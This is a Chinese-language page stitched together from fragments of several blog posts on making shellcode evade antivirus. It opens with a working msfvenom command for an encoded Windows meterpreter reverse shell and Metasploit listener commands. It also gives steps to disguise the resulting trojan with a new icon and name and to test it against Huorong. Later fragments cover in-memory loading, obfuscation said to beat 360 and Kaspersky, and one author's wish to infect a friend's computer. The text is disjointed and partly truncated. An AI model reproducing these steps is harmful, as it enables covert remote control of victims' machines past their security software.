-
首先查看自己的kali ip 作为shell反弹的服务器
2. Kalilinux 生成shellcode木马 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=8888 LHOST=192.168.23.129 -e x86/shikata_ga_nai -i 11 -f py -o sylon.py
3.
把生成的 shellcode 替换如下 python shellcode:
4. 后门程序制作 进入python安装目录script 安装开头三个必要条件 将shellcodo更换个图标
也可以改名字哈 当然图标也可以随意该!!!
5. 拉出来 测测杀毒软件(这里火绒为例)
6.kali 监听 客户机配合点下 哈哈
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_uuid
set lhost 192.168.23.129
set lport 8888
set EnableStageEncoding true
set StageEncoder x86/fnstenv_mov
exploit
本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从
免杀
小白到
免杀
入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触
免杀
,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。
注:以下实验截图均为本人发稿时重新测试所截
0X00 基础概念
1.
python
ctypes模块介绍
ctypes是
Python
的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
文章目录uuid字节转换uuid申请内存写入内存创建进程代码
UUID: 通用唯一标识符 ( Universally Unique Identifier ), 对于所有的UUID它可以保证在空间和时间上的唯一性. 它是通过MAC地址, 时间戳, 命名空间, 随机数, 伪随机数来保证生成ID的唯一性, 有着固定的大小( 128 bit ). 它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID. UUID可以被用作多种用途, 既可以用来短时间内标记一个对象, 也可以可靠的辨别网络中的
杀毒软件工作原理
市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
那些
shell
code
免杀
总结
卿i(https://xz.aliyun.com/u/15540) / 2020-02-07 08:57:08 / 浏览数 20471
自己还是想把一些
shell
code
免杀
的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到
免杀
的实现。
文中我将
shell
code
免杀
技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式,也就是常听到的特征检测、行
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的
shell
code
,本地生成的,用的是Visual Studio。
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
分享一个傻瓜式直接套用大佬的框架进行
shell
code
免杀
,自己还是萌新还需要学习很多东西,大佬们不喜勿喷
360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。
1.基于特征码的静态扫描技术
这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
免杀
学习-认识
shell
code
接着暑假的学习继续更,这学期比较忙,学校里要过逆向考试,加上学生会加上新生班助,还要忙着研究小车做比赛作品,杂七杂八的事一大堆就没更。
这个学期正好学了点逆向的基础知识,那就借此机会学习一下
免杀
,也是
内网渗透
比较重要的一个东西,争取这个寒假搓个
免杀
马,玩一玩兄弟的电脑
什么是
shell
code
这一大堆反斜杠加数字是一串msfvenom生成的
shell
cod...
免杀
方式 msfvenom生成raw格式的
shell
code
–>base64–>XOR–>AES将
python
代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。